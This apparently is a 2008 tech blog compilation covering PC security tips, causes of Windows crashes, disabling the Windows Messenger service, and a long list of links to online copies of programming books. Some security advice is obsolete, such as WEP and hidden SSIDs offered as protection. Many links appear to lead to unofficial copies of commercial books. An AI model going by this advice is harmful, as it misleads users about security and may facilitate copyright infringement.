6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."

10 Reasons Why PCs Crashes

2008-08-07T21:08:00.000-07:00

10 reasons why PCs crash U must Know
Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

so develop a habit to keep the backup of everything that is valuable as a daily backup or as an incremental track route !

enjoy !

Speed Up Slow Pcs

2008-08-07T21:01:00.000-07:00

How To Speed Up A Slow Computer
Start Button and go to "run" type in: msconfig

now you will've a wizard box with various tabs,don't mess with anything else but "startup" , as touching another tab and changing else will cause you trouble .

Now checkout the boxes with the program names n addressesin the blocks. But other than the desired progs. in strtup uncheck every box and then hit apply n ok . A restart wil l do the rest

nice to surf in a gentle manner !

How To Stop Spam

2008-08-07T20:47:00.000-07:00

How To Stop Spam

HOW TO STOP SPAM VIA WINDOWS MESSENGER SERVICE
Below you'll find many ways (sorted in the most successful ratio first) to stop the Windows Messenger service, depending on your system environment, some may require more than one process. This service is available only on NT, 2K, XP & Server 2003. Administrator Login is REQUIRED

The Messenger Service

* Messenger is a Windows Service that runs in the background
* Messenger is not the same as MSN Messenger or any other Instant Messaging Program
* Messenger does not facilitate two-way chatting
* Many Windows Programs, Firewalls, UPS and Antiviruses require the Messenger Service
* Antivirus and UPS software, among others, may not work if Messenger is disabled
* The Messenger Service is usually turned on by default in most Windows NT, 2K and XP systems

1. Manually

1. Example 1

1. Click Start, Run and enter the following command:
RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove
NOTE: This will prevent a long delay when opening Outlook Express if you have the Contacts pane enabled
2. To prevent this, click Start, Run and enter {REGEDIT} Go to:
HKEY_LOCAL_MACHINE\Software\Mcft\Outlook Express
3. Right click in the right pane and select New, Dword value
4. Give it the name Hide Messenger Double click this new entry and set the value to 2
5. End result should look EXACTLY like this:
System Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Outlook Express]
Value Name: Hide Messenger
Data Type: REG_DWORD (DWORD Value)
Value Data: (2 = remove messenger)

2. Example 2

1. Copy and paste the following to Run Command Bar in the Start Menu:
RunDll32.exe advpack.dll,LaunchINFSection
%windir%\inf\msmsgs.inf,BLC.Remove

3. Example 3

1. If Example 5 didn't work, then try this - Many users miss or don't know of it
2. Click on Start then go to RUN and type:
C:\WINDOWS\inf\sysoc.inf
3. Change:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
4. To:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7
5. Then use Add/Remove Windows Components to remove Messenger
NOTE: You can also prevent access to Windows Messenger using Group Policy or the Set Program Access and Defaults utility added by default in Windows XP SP1 and Windows 2000 SP3

4. Example 4

1. Open Windows Messenger
2. From the menu, select "Tools" then "Options" then "Preferences" tab
3. Uncheck "Run this program when Windows starts"
4. Open Outlook Express
5. From the menu, select "Tools" then "Options" then "General" tab
6. Uncheck the option to "Automatically log on", if it's there
7. Also in Outlook Express, select "View" then "Layout"
8. Uncheck the option to "display Contacts" - The program will open a connection and display a list of all Contacts on line if you do not
9. In "Startup Folder" make sure there is no entry there for Messenger
10. Open Norton Anti-Virus if you have it installed
11. Click "Options" then "Instant Messenger"
12. Unckeck "Windows Messenger (recommended"
NOTE: This list ought to work in disassociate MSN from Outlook Express, so that it'll only start up if you really want it to

5. Example 5

1. 2000

* Click Start-> Settings-> Control Panel-> Administrative Tools->Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

2. XP Home

* Click Start->Settings ->Control Panel
* Click Performance and Maintenance
* Click Administrative Tools
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

3. XP Professional

* Click Start->Settings ->Control Panel
* Click Administrative Tools
* Click Services
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties.
* Click the STOP button.
* Select Disable in the Startup Type scroll bar
* Click OK

4. Windows NT

* Click Start ->Control Panel
* Double Click Administrative Tools
* Select Services-> Double-click on Messenger
* In the Messenger Properties window, select Stop
* Then choose Disable as the Startup Type
* Click OK
NOTE: If you stop the service and don’t adjust the startup type, the Messenger service will start automatically the next time you reboot. Keep in mind that when you disable the Messenger service, you'll no longer receive messages about an attached UPS, and you won’t be notified of print job completion, performance alerts, or antivirus activity (from Windows) not the program you're using for those purposes.

6. Example 6

1. To disable receipt of messenger pop-ups, verify that your firewall disables inbound traffic on UDP ports 135, 137, and 138, and TCP ports 135 and 139. On a system connected directly to the Internet, you should also disable inbound traffic on TCP port 445. If the system you want to protect is part of a Win2K-based network with Active Directory (AD), don't block incoming traffic on port 445 - Mcft Knowledge Base Article - 330904
Code:
http://support.Mcft.com/default.aspx?scid=kb;en-us;330904

NOTE: You can use the firewall approach only if your system doesn't communicate with legacy systems that rely on NetBIOS name resolution to locate machines and shared resources. If, for example, you let users running Windows 9x share your printer or scanner, when you disable inbound NetBIOS traffic, users won't be able to connect to these shared resources. Regardless of the method you choose, you can stop messenger spam

2. Program

1. Example 1

NOTE: On Oct 15, 2003, Mcft releases Critical Security Bulletin MS03-043 warning users that the Windows Messenger Service running and exposed by default in all versions of Windows NT, 2000 and XP, contains a "Remote Code Execution" vulnerability that allows any not otherwise secured and protected Windows machine to be taken over and remotely compromised over the Internet
1. Shoot the Messenger
Code:
http://grc.com/files/shootthemessenger.exe

2. Example 2

1. Messenger Disable
Code:
http://www.dougknox.com/xp/utils/MessengerDisable.zip

NOTE: If you choose to uninstall Windows Messenger on a system with SP1 installed, you will receive an error message about "un-registering" an OCX file. This is normal, and doest not affect the removal process. Windows Messenger will still be removed

3. TEST

1. Example 1

1. Right-click "My Computer"
2. Select "Manage"
3. Under "System Tools" right-click on "Shared Folders"
4. Choose "All Tasks" and select "Send Console Message..."
5. If you recieve the following error message then the service has been disabled, otherwise confirm that you have disabled it or try another example
"The following error occured while reading the list of sessions from Windows clients:
Error 2114: The Server service is not started."

2. Example 2

1. Click Start then "Run"
2. Type in {cmd.exe}
3. Type in net send 127.0.0.1 hi
4. If you get a popup "hi" message, then confirm that you have disabled it or try another example

5.

1. If you insist on keeping Windows Messenger, then I'd recommend Messenger Manager - "Allows you to keep your messenger service running, as is intended and needed by Windows. This ensures that vital system errors and notifications may be sent informing you of Important System Events"
Code:
http://www.sellertools.com/default.asp?i=MessageManager3.htm

2. However, as a replacement to Windows Messenger remote control feature, I'd recommend this free tool Virtual Network Computing - "It is a remote control software which allows you to view and interact with one computer (the "server") using a simple program (the "viewer") on another computer anywhere on the Internet. The two computers don't even have to be the same type, so for example you can use VNC to view an office Linux machine on your Windows PC at home"
Code:
http://www.realvnc.com/download.html

more to come !

Thousands of E-books Online

2008-08-07T11:14:00.000-07:00

250+ tech books online
1
10 minute guide to lotus notes mail 4.5
http://www.parsian.net/set1252/pages/books.htm

2
10 minute guide to Microsoft exchange 5.0
http://www.parsian.net/set1252/pages/books.htm

3
10 minute guide to outlook 97
http://www.parsian.net/set1252/pages/books.htm

4
10 minute guide to schedule+ for windows 95
http://www.parsian.net/set1252/pages/books.htm

5
ActiveX programming unleashed
http://www.parsian.net/set1252/pages/books.htm

6
ActiveX programming unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

7
Advanced perl programming
http://www.hk8.org/old_web/

8
Advanced PL/SQL programming with packages
http://www.hk8.org/old_web/

9
Adventure in Prolog/AMZI
www.oopweb.com

10
Algorithms CMSC251/Mount, David
www.oopweb.com

11
Alison Balter's Mastering Access 95 development, premier ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

12
Apache : The definitive guide, 3rd.ed.
http://www.hk8.org/old_web/

13
Beej's guide to network programming/Hall, Brain
www.oopweb.com

14
Beyond Linux from Scratch/BLFS Development Team
http://book.onairweb.net/computer/os/linux/Administration/Beyond_Linux_From_Scratch/

15
Borland C++ builder unleashed
http://www.parsian.net/set1252/pages/books.htm

16
Building an intranet with windows NT 4
http://www.parsian.net/set1252/pages/books.htm

17
Building an Intranet with Windows NT 4
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

18
Building expert systems in prolog/AMZI
www.oopweb.com

19
C programming language
http://book.onairweb.net/computer/pl/C/The_C_Programming_Language_by_K&R/

20
C Programming/Holmes, Steven
www.oopweb.com

21
C++ Annotations
www.oopweb.com

22
CGI developer's guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

23
CGI manual of style
http://www.parsian.net/set1252/pages/books.htm

24
CGI manual of style online
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

25
CGI programming
http://www.hk8.org/old_web/

26
CGI programming unleashed
http://www.parsian.net/set1252/pages/books.htm

27
CGI programming with Perl, 2nd.ed.
http://www.hk8.org/old_web/

28
Charlie Calvert's Borland C++ builder unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

29
Client/server computing, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

30
Client-server computing, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

31
Common LISP, the language/Steele, Guy
www.oopweb.com

32
Compilers and compiler generators : an introduction with C++/Terry, P.D.
www.oopweb.com

33
Complete idiot's guide to creating HTML webpage
http://www.parsian.net/set1252/pages/books.htm

34
Computer graphics CMSC 427/Mount, David
www.oopweb.com

35
Configuring and troubleshooting the windows NT/95 registry
http://www.parsian.net/set1252/pages/books.htm

36
Creating commercial websites
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

37
Creating web applets with Java
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

38
Crystal Reports.NET
http://www.crystalreportsbook.com/Chapters.asp

39
Curious about the internet
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

40
Curious about the internet?
http://www.parsian.net/set1252/pages/books.htm

41
Dan appleman's developing activeX components with Visual Basic 5
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

42
Dan appleman's developing activex components with Visual Basic 5.0
http://www.parsian.net/set1252/pages/books.htm

43
Data structures CMSC420/Mount, David
www.oopweb.com

44
Database developer's guide with visual basic 4, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

45
Database developer's guide with Visual Basic 4, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

46
Database developer's guide with Visual C++ 4, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

47
Database developer's guide with Visual C++ 4, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

48
Design and analysis of computer algorithms CMSC451/Mount, David
www.oopweb.com

49
Designing implementing Microsoft internet information server
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

50
Designing implementing Microsoft proxy server
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

51
Developing for netscape one
http://www.parsian.net/set1252/pages/books.htm

52
Developing intranet applications with java
http://www.parsian.net/set1252/pages/books.htm

53
Developing personal oracle 7 for windows 95 applications
http://www.parsian.net/set1252/pages/books.htm

54
Developing personal Oracle 7 for windows 95 applications
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

55
Developing professional java applets
http://www.parsian.net/set1252/pages/books.htm

56
Developing professional java applets
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

57
DNS and BIND
http://www.hk8.org/old_web/

58
Doing objects with VB.NET and C#
http://vbwire.com/nl?6814

59
EAI/BPM Evaluation Series: IBM WebSphere MQ Workflow v3.3.2 & EAI Suite by
> Middleware Technology Evaluation Series, Phong Tran & Jeffrey Gosper
http://www.cmis.csiro.au/mte/reports/BPM_IBMwebsphereMQ332.htm

60
Effective AWK programming
http://book.onairweb.net/computer/os/shell/Effective_AWK_Programming/

61
Enterprise javabeans, 2nd.ed.
http://www.hk8.org/old_web/

62
Exploring java
http://www.hk8.org/old_web/

63
GNOME/Sheets, John
www.oopweb.com

64
Graph theory/Prof. Even
www.oopweb.com

65
Hacking java
http://www.parsian.net/set1252/pages/books.htm

66
How intranets work
http://www.parsian.net/set1252/pages/books.htm

67
How intranets work
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

68
How to program visual basic 5.0
http://www.parsian.net/set1252/pages/books.htm

69
How to use HTML 3.2
http://www.parsian.net/set1252/pages/books.htm

70
Html : The definitive guide
http://www.hk8.org/old_web/

71
HTML 3.2 & CGI unleashed
http://www.parsian.net/set1252/pages/books.htm

72
HTML 3.2 and CGI professional reference edition unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

73
HTML by example
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

74
Internet firewall
http://www.hk8.org/old_web/

75
Intranets unleashed
http://www.parsian.net/set1252/pages/books.htm

76
Introduction to object-oriented programming using C++/Muller, Peter
www.oopweb.com

77
Introduction to programming using Java/Eck, David
www.oopweb.com

78
Introduction to socket programming
http://book.onairweb.net/computer/network/An_Introduction_to_Socket_Programming/

79
Java 1.1 unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

80
Java 1.1 unleashed, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

81
Java 1.1 unleashed, 3rd.ed.
http://www.parsian.net/set1252/pages/books.htm

82
Java 114 documentation
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

83
Java AWT reference
http://www.hk8.org/old_web/

84
Java by example
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

85
Java developer's guide
http://www.parsian.net/set1252/pages/books.htm

86
Java developer's guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

87
Java developer's reference
http://www.parsian.net/set1252/pages/books.htm

88
Java developer's reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

89
Java Distributed computing
http://www.hk8.org/old_web/

90
Java enterprise
http://www.hk8.org/old_web/

91
Java enterprise in a nutshell
http://www.hk8.org/old_web/

92
Java foundation classes in a nutshell
http://www.hk8.org/old_web/

93
Java fundamental classes reference
http://www.hk8.org/old_web/

94
Java in a nutshell
http://www.hk8.org/old_web/

95
Java in a nutshell, 3rd.ed.
http://www.hk8.org/old_web/

96
Java language reference
http://www.hk8.org/old_web/

97
Java security
http://www.hk8.org/old_web/

98
Java servlet programming
http://www.hk8.org/old_web/

99
Java unleashed
http://www.parsian.net/set1252/pages/books.htm

100
Java unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

101
Java, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

102
_JavaScript : the definitive guide
http://www.hk8.org/old_web/

103
_Javascript manual of style
http://www.parsian.net/set1252/pages/books.htm

104
_Javascript manual of style
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

105
Josh's GNU Linux Guide/Joshua
http://book.onairweb.net/computer/os/linux/Administration/Josh's_GNU_Linux_Guide/

106
Late night activex
http://www.parsian.net/set1252/pages/books.htm

107
Late night activeX
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

108
Laura lemay's 3D graphics in and VRML 2
http://www.parsian.net/set1252/pages/books.htm

109
Laura lemay's activex and _VBScript
http://www.parsian.net/set1252/pages/books.htm

110
Laura lemay's graphics and web page design
http://www.parsian.net/set1252/pages/books.htm

111
Laura lemay's guide to sizzling websites design
http://www.parsian.net/set1252/pages/books.htm

112
Laura lemay's _javascript 1.1
http://www.parsian.net/set1252/pages/books.htm

113
Laura lemay's web workshop activex and _VBScript
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

114
Laura lemay's web workshop Graphics web page design
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

115
Laura lemay's web workshop _javascript
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

116
Learning perl
http://www.hk8.org/old_web/

117
Learning perl on win32
http://www.hk8.org/old_web/

118
Learning the kornshell
http://www.hk8.org/old_web/

119
Learning unix
http://www.hk8.org/old_web/

120
Learning vi
http://www.hk8.org/old_web/

121
Linux from Scratch/Beekmans, Gerard
http://book.onairweb.net/computer/os/linux/Administration/Linux_From_Scratch/

122
Linux in a nutshell, 3rd.ed.
http://www.hk8.org/old_web/

123
Linux kernel/Rusling, David
www.oopweb.com

124
Linux network administrator's guide/Dawson, Terry
www.oopweb.com

125
Linux system administrator's survival guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

126
MAPI, SAPI and TAPI developer's guide
http://www.parsian.net/set1252/pages/books.htm

127
Mastering access 95 development
http://www.parsian.net/set1252/pages/books.htm

128
Microsoft access 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

129
Microsoft access 97 quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

130
Microsoft backoffice 2 unleashed
http://www.parsian.net/set1252/pages/books.htm

131
Microsoft excel 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

132
Microsoft excel 97 quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

133
Microsoft exchange server survival guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

134
Microsoft frontpage unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

135
Microsoft word 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

136
Microsoft word 97 quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

137
Microsoft works 4.5 6-In-1
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

138
More than 100 full-text e-books
http://www.allfreetech.com/EBookCategory.asp

139
Ms backoffice administrator's survival guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

140
Ms backoffice unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

141
Mysql and msql
http://www.hk8.org/old_web/

142
Netscape plug-ins developer's kit
http://www.parsian.net/set1252/pages/books.htm

143
Official gamelan java directory
http://www.parsian.net/set1252/pages/books.htm

144
Oracle built-in packages
http://www.hk8.org/old_web/

145
Oracle PL/SQL built-in pocket reference
http://www.hk8.org/old_web/

146
Oracle PL/SQL language pocket reference
http://www.hk8.org/old_web/

147
Oracle PL/SQL programming guide to Oracle 8 features
http://www.hk8.org/old_web/

148
Oracle PL/SQL programming, 2nd.ed.
http://www.hk8.org/old_web/

149
Oracle unleashed
http://www.parsian.net/set1252/pages/books.htm

150
Oracle unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

151
Oracle web applications PL/SQL developer's introduction
http://www.hk8.org/old_web/

152
Patterns of enterprise application architecture/Fowler, Martin
http://www.awprofessional.com/catalog/product.asp?product_id={574D77DF-6ED2-BC5-A6A8-02E59CA7482D}

153
PC week : the intranet advantage
http://www.parsian.net/set1252/pages/books.htm

154
Perl 5 by example
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

155
Perl 5 quick reference
http://www.parsian.net/set1252/pages/books.htm

156
Perl 5 unleashed
http://www.parsian.net/set1252/pages/books.htm

157
Perl 5.0 CGI web pages
http://www.parsian.net/set1252/pages/books.htm

158
Perl cookbook
http://www.hk8.org/old_web/

159
Perl for system administration
http://www.hk8.org/old_web/

160
Perl in a nutshell
http://www.hk8.org/old_web/

161
Perl quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

162
Peter norton's complete guide to windows NT 4 workstations
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

163
Presenting activex
http://www.parsian.net/set1252/pages/books.htm

164
Presenting activex
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

165
Presenting javabeans
http://www.parsian.net/set1252/pages/books.htm

166
Presenting javabeans
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

167
Programming perl
http://www.hk8.org/old_web/

168
Programming perl, 3rd.ed.
http://www.hk8.org/old_web/

169
Programming the Perl DBI
http://www.hk8.org/old_web/

170
Red hat linux unleashed
http://www.parsian.net/set1252/pages/books.htm

171
Running a perfect intranet
http://www.parsian.net/set1252/pages/books.htm

172
Running Linux, 3rd.ed.
http://www.hk8.org/old_web/

173
Sams teach yourself java 1.1 in 24 hours/
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_1.1_Programming_in_24_Hours

174
Sams Teach yourself java in 21 days/Lemay, Laura
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_in_21_Days/

175
Sams teach yourself linux in 24 hours/Ball, Bill
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Linux_in_24%20Hours/

176
Sams teach yourself shell programming in 24 hours
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Shell_Programming_in_24_Hours/

177
Sams teach yourself TCP/IP in 14 days
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_TCP-IP_in_14_Days(SE)/

178
Sed and awk
http://www.hk8.org/old_web/

179
Sendmail
http://www.hk8.org/old_web/

180
Sendmail desktop reference
http://www.hk8.org/old_web/

181
Slackware linux unleashed
